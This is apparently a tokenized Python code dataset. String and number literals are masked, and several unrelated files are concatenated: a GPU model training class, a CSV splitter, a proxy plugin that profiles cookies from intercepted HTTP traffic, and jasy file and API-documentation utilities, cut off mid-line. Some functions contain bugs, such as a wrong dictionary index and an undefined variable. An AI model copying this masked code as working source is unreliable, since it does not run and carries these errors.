print_iteration ( self ) : <EOL> print "<STR_LIT>" % ( self . epoch , self . batchnum ) , <EOL> def print_train_time ( self , compute_time_py ) : <EOL> print "<STR_LIT>" % ( compute_time_py ) <EOL> def print_train_results ( self ) : <EOL> batch_error = self . train_outputs [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> if not ( batch_error > <NUM_LIT:0> and batch_error < <NUM_LIT> ) : <EOL> print "<STR_LIT>" % batch_error <EOL> self . cleanup ( ) <EOL> print "<STR_LIT>" % ( batch_error ) , <EOL> def print_test_results ( self ) : <EOL> batch_error = self . test_outputs [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> print "<STR_LIT>" % ( NL , batch_error ) , <EOL> def print_test_status ( self ) : <EOL> status = ( len ( self . test_outputs ) == <NUM_LIT:1> or self . test_outputs [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] < self . test_outputs [ - <NUM_LIT:2> ] [ <NUM_LIT:0> ] ) and "<STR_LIT>" or "<STR_LIT>" <EOL> print status , <EOL> def conditional_save ( self ) : <EOL> batch_error = self . test_outputs [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> if batch_error > <NUM_LIT:0> and batch_error < self . max_test_err : <EOL> self . save_state ( ) <EOL> else : <EOL> print "<STR_LIT>" % self . max_test_err , <EOL> def aggregate_test_outputs ( self , test_outputs ) : <EOL> test_error = tuple ( [ sum ( t [ r ] for t in test_outputs ) / ( <NUM_LIT:1> if self . test_one else len ( self . test_batch_range ) ) for r in range ( len ( test_outputs [ - <NUM_LIT:1> ] ) ) ] ) <EOL> return test_error <EOL> def get_test_error ( self ) : <EOL> next_data = self . get_next_batch ( train = False ) <EOL> test_outputs = [ ] <EOL> while True : <EOL> data = next_data <EOL> self . start_batch ( data , train = False ) <EOL> load_next = not self . test_one and data [ <NUM_LIT:1> ] < self . test_batch_range [ - <NUM_LIT:1> ] <EOL> if load_next : <EOL> next_data = self . get_next_batch ( train = False ) <EOL> test_outputs += [ self . finish_batch ( ) ] <EOL> if self . test_only : <EOL> print "<STR_LIT>" % ( data [ <NUM_LIT:1> ] , str ( test_outputs [ - <NUM_LIT:1> ] ) ) <EOL> if not load_next : <EOL> break <EOL> sys . stdout . flush ( ) <EOL> return self . aggregate_test_outputs ( test_outputs ) <EOL> def set_var ( self , var_name , var_val ) : <EOL> setattr ( self , var_name , var_val ) <EOL> self . model_state [ var_name ] = var_val <EOL> return var_val <EOL> def get_var ( self , var_name ) : <EOL> return self . model_state [ var_name ] <EOL> def has_var ( self , var_name ) : <EOL> return var_name in self . model_state <EOL> def save_state ( self ) : <EOL> for att in self . model_state : <EOL> if hasattr ( self , att ) : <EOL> self . model_state [ att ] = getattr ( self , att ) <EOL> dic = { "<STR_LIT>" : self . model_state , <EOL> "<STR_LIT>" : self . op } <EOL> checkpoint_dir = os . path . join ( self . save_path , self . save_file ) <EOL> checkpoint_file = "<STR_LIT>" % ( self . epoch , self . batchnum ) <EOL> checkpoint_file_full_path = os . path . join ( checkpoint_dir , checkpoint_file ) <EOL> if not os . path . exists ( checkpoint_dir ) : <EOL> os . makedirs ( checkpoint_dir ) <EOL> pickle ( checkpoint_file_full_path , dic , compress = self . zip_save ) <EOL> for f in sorted ( os . listdir ( checkpoint_dir ) , key = alphanum_key ) : <EOL> if sum ( os . path . getsize ( os . path . join ( checkpoint_dir , f2 ) ) for f2 in os . listdir ( checkpoint_dir ) ) > self . max_filesize_mb * <NUM_LIT> * <NUM_LIT> and f != checkpoint_file : <EOL> os . remove ( os . path . join ( checkpoint_dir , f ) ) <EOL> else : <EOL> break <EOL> @ staticmethod <EOL> def load_checkpoint ( load_dir ) : <EOL> if os . path . isdir ( load_dir ) : <EOL> return unpickle ( os . path . join ( load_dir , sorted ( os . listdir ( load_dir ) , key = alphanum_key ) [ - <NUM_LIT:1> ] ) ) <EOL> return unpickle ( load_dir ) <EOL> @ staticmethod <EOL> def get_options_parser ( ) : <EOL> op = OptionsParser ( ) <EOL> op . add_option ( "<STR_LIT:f>" , "<STR_LIT>" , StringOptionParser , "<STR_LIT>" , default = "<STR_LIT>" , excuses = OptionsParser . EXCLUDE_ALL ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , RangeOptionParser , "<STR_LIT>" ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , RangeOptionParser , "<STR_LIT>" ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , StringOptionParser , "<STR_LIT>" , default = "<STR_LIT:default>" ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , IntegerOptionParser , "<STR_LIT>" , default = <NUM_LIT> ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , IntegerOptionParser , "<STR_LIT>" , default = <NUM_LIT> ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , StringOptionParser , "<STR_LIT>" ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , StringOptionParser , "<STR_LIT>" ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , IntegerOptionParser , "<STR_LIT>" , default = <NUM_LIT> ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , FloatOptionParser , "<STR_LIT>" ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , IntegerOptionParser , "<STR_LIT>" , default = <NUM_LIT:1> ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , BooleanOptionParser , "<STR_LIT>" , default = <NUM_LIT:0> ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , BooleanOptionParser , "<STR_LIT>" , default = <NUM_LIT:0> ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , BooleanOptionParser , "<STR_LIT>" , default = <NUM_LIT:1> ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , ListOptionParser ( IntegerOptionParser ) , "<STR_LIT>" , default = OptionExpression ( "<STR_LIT>" ) ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , FloatOptionParser , "<STR_LIT>" , default = <NUM_LIT:1> ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , BooleanOptionParser , "<STR_LIT>" , default = False ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , StringOptionParser , "<STR_LIT>" , default = "<STR_LIT>" ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , BooleanOptionParser , "<STR_LIT>" , <EOL> default = False ) <EOL> return op <EOL> @ staticmethod <EOL> def print_data_providers ( ) : <EOL> print "<STR_LIT>" <EOL> for dp , desc in dp_types . iteritems ( ) : <EOL> print "<STR_LIT>" % ( dp , desc ) <EOL> def get_gpus ( self ) : <EOL> self . device_ids = [ get_gpu_lock ( g ) for g in self . op . get_value ( '<STR_LIT>' ) ] <EOL> if GPU_LOCK_NO_LOCK in self . device_ids : <EOL> print "<STR_LIT>" <EOL> sys . exit ( ) <EOL> @ staticmethod <EOL> def parse_options ( op ) : <EOL> try : <EOL> load_dic = None <EOL> options = op . parse ( ) <EOL> if options [ "<STR_LIT>" ] . value_given : <EOL> load_dic = IGPUModel . load_checkpoint ( options [ "<STR_LIT>" ] . value ) <EOL> old_op = load_dic [ "<STR_LIT>" ] <EOL> old_op . merge_from ( op ) <EOL> op = old_op <EOL> op . eval_expr_defaults ( ) <EOL> return op , load_dic <EOL> except OptionMissingException , e : <EOL> print e <EOL> op . print_usage ( ) <EOL> except OptionException , e : <EOL> print e <EOL> except UnpickleError , e : <EOL> print "<STR_LIT>" <EOL> print e <EOL> sys . exit ( ) </s>
<s> '''<STR_LIT>''' <EOL> import csv <EOL> import sys <EOL> import random <EOL> input_file = sys . argv [ <NUM_LIT:1> ] <EOL> output_file1 = sys . argv [ <NUM_LIT:2> ] <EOL> output_file2 = sys . argv [ <NUM_LIT:3> ] <EOL> try : <EOL> P = float ( sys . argv [ <NUM_LIT:4> ] ) <EOL> except IndexError : <EOL> P = <NUM_LIT> <EOL> try : <EOL> seed = sys . argv [ <NUM_LIT:5> ] <EOL> except IndexError : <EOL> seed = None <EOL> try : <EOL> skip_headers = sys . argv [ <NUM_LIT:6> ] <EOL> except IndexError : <EOL> skip_headers = False <EOL> try : <EOL> skip_headers = sys . argv [ <NUM_LIT:6> ] <EOL> except IndexError : <EOL> skip_headers = False <EOL> print "<STR_LIT>" % ( P ) <EOL> if seed : <EOL> random . seed ( seed ) <EOL> i = open ( input_file ) <EOL> o1 = open ( output_file1 , '<STR_LIT:wb>' ) <EOL> o2 = open ( output_file2 , '<STR_LIT:wb>' ) <EOL> if skip_headers : <EOL> i . readline ( ) <EOL> counter = <NUM_LIT:0> <EOL> for line in i : <EOL> r = random . random ( ) <EOL> if r > P : <EOL> o2 . write ( line ) <EOL> else : <EOL> o1 . write ( line ) <EOL> counter += <NUM_LIT:1> <EOL> if counter % <NUM_LIT> == <NUM_LIT:0> : <EOL> print counter </s>
<s> from hiccup import BasePlugin <EOL> from hiccup import SharedFunctions as shared <EOL> from synchronize import * <EOL> import re <EOL> class CookieProfiler ( BasePlugin . BasePlugin ) : <EOL> required_config = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> plugin_scope = '<STR_LIT>' <EOL> str_cookies = '<STR_LIT>' <EOL> re_cookies = re . compile ( str_cookies ) <EOL> results_columns = [ ( '<STR_LIT:A>' , '<STR_LIT>' , <NUM_LIT:50> ) , ( '<STR_LIT:B>' , '<STR_LIT>' , <NUM_LIT:30> ) , ( '<STR_LIT:C>' , '<STR_LIT>' , <NUM_LIT:50> ) ] <EOL> def __init__ ( self , global_config ) : <EOL> BasePlugin . BasePlugin . __init__ ( self , global_config , self . required_config , self . plugin_scope ) <EOL> self . output_file = global_config [ self . plugin_name ] [ '<STR_LIT>' ] <EOL> self . write_after = global_config [ self . plugin_name ] [ '<STR_LIT>' ] <EOL> self . cookiejar = { } <EOL> self . count = <NUM_LIT:0> <EOL> def process_request ( self , message ) : <EOL> self . process_message ( message ) <EOL> def process_response ( self , message ) : <EOL> self . process_message ( message ) <EOL> @ make_synchronized <EOL> def update_results ( self , codata ) : <EOL> data = [ ] <EOL> for host in sorted ( codata ) : <EOL> for key in sorted ( codata [ host ] ) : <EOL> data . append ( [ host , key , '<STR_LIT:U+002C>' . join ( sorted ( codata [ host ] [ key ] ) ) ] ) <EOL> shared . write_xlsx ( self . output_file , '<STR_LIT>' , self . results_columns , data ) <EOL> self . logger . info ( "<STR_LIT>" % ( self . count , self . output_file ) ) <EOL> def process_message ( self , message ) : <EOL> self . count = self . count + <NUM_LIT:1> <EOL> if ( self . count % self . write_after == <NUM_LIT:0> ) : <EOL> self . update_results ( self . cookiejar ) <EOL> for line in message [ '<STR_LIT>' ] . splitlines ( ) : <EOL> res = self . re_cookies . match ( line ) <EOL> if ( res ) : <EOL> if ( message [ '<STR_LIT>' ] not in self . cookiejar ) : <EOL> self . cookiejar [ message [ '<STR_LIT>' ] ] = { } <EOL> for ( key , val ) in [ ( ckey [ <NUM_LIT:0> ] . strip ( ) , ckey [ - <NUM_LIT:1> ] . strip ( ) ) for ckey in [ keyval . split ( '<STR_LIT:=>' ) for keyval in res . group ( '<STR_LIT>' ) . split ( '<STR_LIT:;>' ) ] ] : <EOL> if ( key not in self . cookiejar [ message [ '<STR_LIT>' ] ] ) : <EOL> self . cookiejar [ message [ '<STR_LIT>' ] ] [ key ] = set ( ) <EOL> if ( val != key ) : <EOL> self . cookiejar [ message [ '<STR_LIT>' ] ] [ key ] . add ( val ) </s>
<s> """<STR_LIT>""" <EOL> import shutil , os , hashlib <EOL> from jasy import UserError <EOL> def cp ( src , dst ) : <EOL> """<STR_LIT>""" <EOL> mkdir ( os . path . dirname ( dst ) ) <EOL> return shutil . copy2 ( src , dst ) <EOL> def cpdir ( src , dst ) : <EOL> """<STR_LIT>""" <EOL> return shutil . copytree ( src , dst ) <EOL> def exists ( name ) : <EOL> """<STR_LIT>""" <EOL> return os . path . exists ( name ) <EOL> def mkdir ( name ) : <EOL> """<STR_LIT>""" <EOL> if os . path . isdir ( name ) : <EOL> return <EOL> elif os . path . exists ( name ) : <EOL> raise UserError ( "<STR_LIT>" % name ) <EOL> return os . makedirs ( name ) <EOL> def mv ( src , dst ) : <EOL> """<STR_LIT>""" <EOL> return shutil . move ( src , dst ) <EOL> def rm ( name ) : <EOL> """<STR_LIT>""" <EOL> return os . remove ( name ) <EOL> def rmdir ( name ) : <EOL> """<STR_LIT>""" <EOL> return shutil . rmtree ( name ) <EOL> def write ( dst , content ) : <EOL> """<STR_LIT>""" <EOL> mkdir ( os . path . dirname ( dst ) ) <EOL> handle = open ( dst , mode = "<STR_LIT:w>" , encoding = "<STR_LIT:utf-8>" ) <EOL> handle . write ( content ) <EOL> handle . close ( ) <EOL> def syncfile ( src , dst ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . isfile ( src ) : <EOL> raise Exception ( "<STR_LIT>" % src ) <EOL> try : <EOL> dst_mtime = os . path . getmtime ( dst ) <EOL> src_mtime = os . path . getmtime ( src ) <EOL> if src_mtime == dst_mtime : <EOL> return False <EOL> except OSError : <EOL> pass <EOL> return cp ( src , dst ) <EOL> def sha1 ( fileOrPath , block_size = <NUM_LIT:2> ** <NUM_LIT:20> ) : <EOL> """<STR_LIT>""" <EOL> if type ( fileOrPath ) is str : <EOL> fileOrPath = open ( fileOrPath , "<STR_LIT:rb>" ) <EOL> sha1res = hashlib . sha1 ( ) <EOL> while True : <EOL> data = fileOrPath . read ( block_size ) <EOL> if not data : <EOL> break <EOL> sha1res . update ( data ) <EOL> return sha1res . hexdigest ( ) </s>
<s> import copy , re , os , json <EOL> import jasy . js . api . Data as Data <EOL> import jasy . js . api . Text as Text <EOL> import jasy . core . File as File <EOL> from jasy . js . util import * <EOL> import jasy . core . Console as Console <EOL> from jasy import UserError <EOL> __all__ = [ "<STR_LIT>" ] <EOL> itemMap = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> linkMap = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> linkExtract = re . compile ( r"<STR_LIT>" , re . M ) <EOL> internalLinkParse = re . compile ( r"<STR_LIT>" ) <EOL> def convertFunction ( item ) : <EOL> item [ "<STR_LIT>" ] = True <EOL> if "<STR_LIT>" in item : <EOL> params = item [ "<STR_LIT>" ] <EOL> paramsNew = [ ] <EOL> sortedParams = list ( sorted ( params , key = lambda paramName : params [ paramName ] [ "<STR_LIT>" ] ) ) <EOL> for paramName in sortedParams : <EOL> param = params [ paramName ] <EOL> param [ "<STR_LIT:name>" ] = paramName <EOL> paramsNew . append ( param ) <EOL> item [ "<STR_LIT>" ] = paramsNew <EOL> def convertTags ( item ) : <EOL> if "<STR_LIT>" in item : <EOL> tags = item [ "<STR_LIT>" ] <EOL> tagsNew = [ ] <EOL> if tags : <EOL> for tagName in sorted ( tags ) : <EOL> tag = { "<STR_LIT:name>" : tagName } <EOL> if tags [ tagName ] is not True : <EOL> tag [ "<STR_LIT:value>" ] = "<STR_LIT:+>" . join ( tags [ tagName ] ) <EOL> tagsNew . append ( tag ) <EOL> item [ "<STR_LIT>" ] = tagsNew <EOL> def safeUpdate ( dest , origin ) : <EOL> """<STR_LIT>""" <EOL> for key in origin : <EOL> if not key in dest : <EOL> dest [ key ] = origin [ dest ] <EOL> def isErrornous ( data ) : <EOL> if "<STR_LIT>" in data : <EOL> return True <EOL> if "<STR_LIT>" in data : <EOL> for paramName in data [ "<STR_LIT>" ] : <EOL> param = data [ "<STR_LIT>" ] [ paramName ] <EOL> if "<STR_LIT>" in param : <EOL> return True <EOL> return False <EOL> def mergeMixin ( className , mixinName , classApi , mixinApi ) : <EOL> Console . info ( "<STR_LIT>" , mixinName , className ) <EOL> sectionLink = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> for pos , section in enumerate ( ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) : <EOL> mixinItems = getattr ( mixinApi , section , None ) <EOL> if mixinItems : <EOL> classItems = getattr ( classApi , section , None ) <EOL> if not classItems : <EOL> classItems = { } <EOL> setattr ( classApi , section , classItems ) <EOL> for name in mixinItems : <EOL> if name in classItems : <EOL> if "<STR_LIT>" in classItems [ name ] : <EOL> classItems [ name ] [ "<STR_LIT>" ] . append ( { <EOL> "<STR_LIT:name>" : mixinName , <EOL> "<STR_LIT>" : "<STR_LIT>" % ( sectionLink [ pos ] , mixinName , name ) <EOL> } ) <EOL> else : <EOL> if not "<STR_LIT>" in classItems [ name ] : <EOL> classItems [ name ] [ "<STR_LIT>" ] = [ ] <EOL> classItems [ name ] [ "<STR_LIT>" ] . append ( { <EOL> "<STR_LIT:name>" : mixinName , <EOL> "<STR_LIT>" : "<STR_LIT>" % ( sectionLink [ pos ] , mixinName , name ) <EOL> } ) <EOL> else : <EOL> classItems [ name ] = { } <EOL> classItems [ name ] . update ( mixinItems [ name ] ) <EOL> if not "<STR_LIT>" in classItems [ name ] : <EOL> classItems [ name ] [ "<STR_LIT>" ] = [ ] <EOL> classItems [ name ] [ "<STR_LIT>" ] . append ( { <EOL> "<STR_LIT:name>" : mixinName , <EOL> "<STR_LIT>" : "<STR_LIT>" % ( sectionLink [ pos ] , mixinName , name ) <EOL> } ) <EOL> def connectInterface ( className , interfaceName , classApi , interfaceApi ) : <EOL> Console . debug ( "<STR_LIT>" , className , interfaceName ) <EOL> interfaceProperties = getattr ( interfaceApi , "<STR_LIT>" , None ) <EOL> if interfaceProperties : <EOL> classProperties = getattr ( classApi , "<STR_LIT>" , { } ) <EOL> for name in interfaceProperties : <EOL> if not name in classProperties : <EOL> Console . warn ( "<STR_LIT>" , className , name , interfaceName ) <EOL> else : <EOL> if not "<STR_LIT>" in classProperties [ name ] : <EOL> classProperties [ name ] [ "<STR_LIT>" ] = [ ] <EOL> classProperties [ name ] [ "<STR_LIT>" ] . append ( { <EOL> "<STR_LIT:name>" : interfaceName , <EOL> "<STR_LIT>" : "<STR_LIT>" % ( interfaceName , name ) <EOL> } ) <EOL> if not "<STR_LIT>" in classProperties [ name ] and "<STR_LIT>" in interfaceProperties [ name ] : <EOL> classProperties [ name ] [ "<STR_LIT>" ] = interfaceProperties [ name ] [ "<STR_LIT>" ] <EOL> if not "<STR_LIT>" in classProperties [ name ] and "<STR_LIT>" in interfaceProperties [ name ] : <EOL> classProperties [ name ] [ "<STR_LIT>" ] = interfaceProperties [ name ] [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in classProperties [ name ] and not "<STR_LIT>" in interfaceProperties [ name ] : <EOL> del classProperties [ name ] [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in interfaceProperties [ name ] : <EOL> if not "<STR_LIT>" in classProperties [ name ] : <EOL> classProperties [ name ] [ "<STR_LIT>" ] = { } <EOL> safeUpdate ( classProperties [ name ] [ "<STR_LIT>" ] , interfaceProperties [ name ] [ "<STR_LIT>" ] ) <EOL> interfaceEvents = getattr ( interfaceApi , "<STR_LIT>" , None ) <EOL> if interfaceEvents : <EOL> classEvents = getattr ( classApi , "<STR_LIT>" , { } ) <EOL> for name in interfaceEvents : <EOL> if not name in classEvents : <EOL> Console . warn ( "<STR_LIT>" , className , name , interfaceName ) <EOL> else : <EOL> if not "<STR_LIT>" in classEvents [ name ] : <EOL> classEvents [ name ] [ "<STR_LIT>" ] = [ ] <EOL> classEvents [ name ] [ "<STR_LIT>" ] . append ( { <EOL> "<STR_LIT:name>" : interfaceName , <EOL> "<STR_LIT>" : "<STR_LIT>" % ( interfaceName , name ) <EOL> } ) <EOL> if not "<STR_LIT>" in classEvents [ name ] and "<STR_LIT>" in interfaceEvents [ name ] : <EOL> classEvents [ name ] [ "<STR_LIT>" ] = interfaceEvents [ name ] [ "<STR_LIT>" ] <EOL> if not "<STR_LIT>" in classEvents [ name ] and "<STR_LIT>" in interfaceEvents [ name ] : <EOL> classEvents [ name ] [ "<STR_LIT>" ] = interfaceEvents [ name ] [ "<STR_LIT>" ] <EOL> if not "<STR_LIT:type>" in classEvents [ name ] and "<STR_LIT:type>" in interfaceEvents [ name ] : <EOL> classEvents [ name ] [ "<STR_LIT:type>" ] = interfaceEvents [ name ] [ "<STR_LIT:type>" ] <EOL> if "<STR_LIT>" in classEvents [ name ] and not "<STR_LIT>" in interfaceEvents [ name ] : <EOL> del classEvents [ name ] [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in interfaceEvents [ name ] : <EOL> if not "<STR_LIT>" in classEntry : <EOL> classEvents [ name ] [ "<STR_LIT>" ] = { } <EOL> safeUpdate ( classEvents [ name ] [ "<STR_LIT>" ] , interfaceEvents [ name ] [ "<STR_LIT>" ] ) <EOL> interfaceMembers = getattr ( interfaceApi , "<STR_LIT>" , None ) <EOL> if interfaceMembers : <EOL> classMembers = getattr ( classApi , "<STR_LIT>" , { } ) <EOL> for name in interfaceMembers : <EOL> if not name in classMembers : <EOL> Console . warn ( "<STR_LIT>" , className , name , interfaceName ) <EOL> else : <EOL> interfaceEntry = interfaceMembers [ name ] <EOL> classEntry = classMembers [ name ] <EOL> if not "<STR_LIT>" in classEntry : <EOL> classEntry [ "<STR_LIT>" ] = [ ] <EOL> classEntry [ "<STR_LIT>" ] . append ( { <EOL> "<STR_LIT:name>" : interfaceName , <EOL> "<STR_LIT>" : "<STR_LIT>" % ( interfaceName , name ) <EOL> } ) <EOL> if not "<STR_LIT>" in classEntry and "<STR_LIT>" in interfaceEntry : <EOL> classEntry [ "<STR_LIT>" ] = interfaceEntry [ "<STR_LIT>" ] <EOL> if not "<STR_LIT>" in classEntry and "<STR_LIT>" in interfaceEntry : <EOL> classEntry [ "<STR_LIT>" ] = interfaceEntry [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in classEntry and not "<STR_LIT>" in interfaceEntry : <EOL> del classEntry [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in interfaceEntry : <EOL> classEntry [ "<STR_LIT>" ] = interfaceEntry [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in interfaceEntry : <EOL> if not "<STR_LIT>" in classEntry : <EOL> classEntry [ "<STR_LIT>" ] = { } <EOL> safeUpdate ( classEntry [ "<STR_LIT>" ] , interfaceEntry [ "<STR_LIT>" ] ) <EOL> if "<STR_LIT>" in interfaceEntry : <EOL> if not "<STR_LIT>" in classEntry : <EOL> classEntry [ "<STR_LIT>" ] = { } <EOL> for paramName in interfaceEntry [ "<STR_LIT>" ] : <EOL> if not paramName in classEntry [ "<STR_LIT>" ] : <EOL> classEntry [ "<STR_LIT>" ] [ paramName ] = { } <EOL> classEntry [ "<STR_LIT>" ] [ paramName ] . update ( interfaceEntry [ "<STR_LIT>" ] [ paramName ] ) <EOL> if "<STR_LIT>" in classEntry [ "<STR_LIT>" ] [ paramName ] and not "<STR_LIT>" in interfaceEntry [ "<STR_LIT>" ] [ paramName ] : <EOL> del classEntry [ "<STR_LIT>" ] [ paramName ] [ "<STR_LIT>" ] <EOL> class ApiWriter ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , session ) : <EOL> self . __session = session <EOL> def __isIncluded ( self , className , classFilter ) : <EOL> if not classFilter : <EOL> return True <EOL> if type ( classFilter ) is tuple : <EOL> if className . startswith ( classFilter ) : <EOL> return True <EOL> elif not classFilter ( className ) : <EOL> return True <EOL> return False <EOL> def write ( self , distFolder , classFilter = None , callback = "<STR_LIT>" , showInternals = False , showPrivates = False , printErrors = True , highlightCode = True ) : <EOL> """<STR_LIT>""" <EOL> Console . info ( "<STR_LIT>" ) <EOL> Console . indent ( ) <EOL> apiData = { } <EOL> highlightedCode = { } <EOL> for project in self . __session . getProjects ( ) : <EOL> classes = project . getClasses ( ) <EOL> Console . info ( "<STR_LIT>" , Console . colorize ( project . getName ( ) , "<STR_LIT>" ) , Console . colorize ( "<STR_LIT>" % len ( classes ) , "<STR_LIT>" ) ) <EOL> Console . indent ( ) <EOL> for className in classes : <EOL> if self . __isIncluded ( className , classFilter ) : <EOL> data = classes [ className ] . getApi ( highlightCode ) <EOL> if not data . isEmpty : <EOL> apiData [ className ] = data <EOL> highlightedCode [ className ] = classes [ className ] . getHighlightedCode ( ) <EOL> else : <EOL> Console . info ( "<STR_LIT>" % className ) <EOL> Console . outdent ( ) <EOL> Console . outdent ( ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> Console . indent ( ) <EOL> data , index , search = self . __process ( apiData , classFilter = classFilter , internals = showInternals , privates = showPrivates , printErrors = printErrors , highlightCode = highlightCode ) <EOL> Console . outdent ( ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> Console . indent ( ) <EOL> writeCounter = <NUM_LIT:0> <EOL> extension = "<STR_LIT>" if callback else "<STR_LIT>" <EOL> compress = True <EOL> class JsonEncoder ( json . JSONEncoder ) : <EOL> def default ( self , obj ) : <EOL> if isinstance ( obj , set ) : <EOL> return list ( obj ) <EOL> return json . JSONEncoder . default ( self , obj ) <EOL> def encode ( content , name ) : <EOL> if compress : <EOL> jsonContent = json . dumps ( content , sort_keys = True , cls = JsonEncoder , separators = ( '<STR_LIT:U+002C>' , '<STR_LIT::>' ) ) <EOL> else : <EOL> jsonContent = json . dumps ( content , sort_keys = True , cls = JsonEncoder , indent = <NUM_LIT:2> ) <EOL> if callback : <EOL> return "<STR_LIT>" % ( callback , jsonContent , name ) <EOL> else : <EOL> return jsonContent <EOL> Console . info ( "<STR_LIT>" , len ( data ) ) <EOL> Console . indent ( ) <EOL> for className in data : <EOL> try : <EOL> classData = data [ className ] <EOL> if type ( classData ) is dict : <EOL> classExport = classData <EOL> else : <EOL> classExport = classData . export ( ) <EOL> File . write ( self . __session . expandFileName ( os . path . join ( distFolder , "<STR_LIT>" % ( className , extension ) ) ) , encode ( classExport , className ) ) <EOL> except TypeError as writeError : <EOL> Console . error ( "<STR_LIT>" , className , writeError ) <EOL> continue <EOL> Console . outdent ( ) <EOL> if highlightCode : <EOL> Console . info ( "<STR_LIT>" , len ( highlightedCode ) ) <EOL> Console . indent ( ) <EOL> for className in highlightedCode : <EOL> try : <EOL> File . write ( self . __session . expandFileName ( os . path . join ( distFolder , "<STR_LIT>" % className ) ) , highlightedCode [ className ] ) <EOL> except TypeError as writeError : <EOL> Console . error ( "<STR_LIT>" , className , writeError ) <EOL> continue <EOL> Console . outdent ( ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> Console . indent ( ) <EOL> File . write ( self . __session . expandFileName ( os . path . join ( distFolder , "<STR_LIT>" % extension ) ) , encode ( index , "<STR_LIT>" ) ) <EOL> File . write ( self . __session . expandFileName ( os . path . join ( distFolder , "<STR_LIT>" % extension ) ) , encode ( search , "<STR_LIT>" ) ) <EOL> Console . outdent ( ) <EOL> Console . outdent ( ) <EOL> def __process ( self , apiData , classFilter = None , internals = False , privates = False , printErrors = True , highlightCode = True ) : <EOL> knownClasses = set ( list ( apiData ) ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> for className in apiData : <EOL> classApi = apiData [ className ] <EOL> constructData = getattr ( classApi , "<STR_LIT>" , None ) <EOL> if constructData is not None : <EOL> if "<STR_LIT>" in constructData : <EOL> constructData [ "<STR_LIT>" ] = "<STR_LIT>" % ( className , constructData [ "<STR_LIT>" ] ) <EOL> for section in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> sectionData = getattr ( classApi , section , None ) <EOL> if sectionData is not None : <EOL> for name in sectionData : <EOL> if "<STR_LIT>" in sectionData [ name ] : <EOL> sectionData [ name ] [ "<STR_LIT>" ] = "<STR_LIT>" % ( className , sectionData [ name ] [ "<STR_LIT>" ] ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> Console . indent ( ) <EOL> mergedClasses = set ( ) <EOL> def getApi ( className ) : <EOL> classApi = apiData [ className ] <EOL> if className in mergedClasses : <EOL> return classApi <EOL> classIncludes = getattr ( classApi , "<STR_LIT>" , None ) <EOL> if classIncludes : <EOL> for mixinName in classIncludes : <EOL> if not mixinName in apiData : <EOL> Console . error ( "<STR_LIT>" , className , mixinName ) <EOL> continue <EOL> mixinApi = apiData [ mixinName ] <EOL> if not hasattr ( mixinApi , "<STR_LIT>" ) : <EOL> mixinApi . includedBy = set ( ) <EOL> mixinApi . includedBy . add ( className ) <EOL> mergeMixin ( className , mixinName , classApi , getApi ( mixinName ) ) <EOL> mergedClasses . add ( className ) <EOL> return classApi <EOL> for className in apiData : <EOL> apiData [ className ] = getApi ( className ) <EOL> Console . outdent ( ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> additionalTypes = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> def checkInternalLink ( link , className ) : <EOL> match = internalLinkParse . match ( link ) <EOL> if not match : <EOL> return '<STR_LIT>' % link <EOL> if match . group ( <NUM_LIT:3> ) is not None : <EOL> className = match . group ( <NUM_LIT:3> ) <EOL> if not className in knownClasses and not className in apiData : <EOL> return '<STR_LIT>' % link <EOL> if not className in apiData : <EOL> return True <EOL> classApi = apiData [ className ] <EOL> sectionName = match . group ( <NUM_LIT:2> ) <EOL> itemName = match . group ( <NUM_LIT:5> ) <EOL> if itemName is None : <EOL> return True <EOL> if sectionName is not None : <EOL> if not sectionName in linkMap : <EOL> return '<STR_LIT>' % link <EOL> section = getattr ( 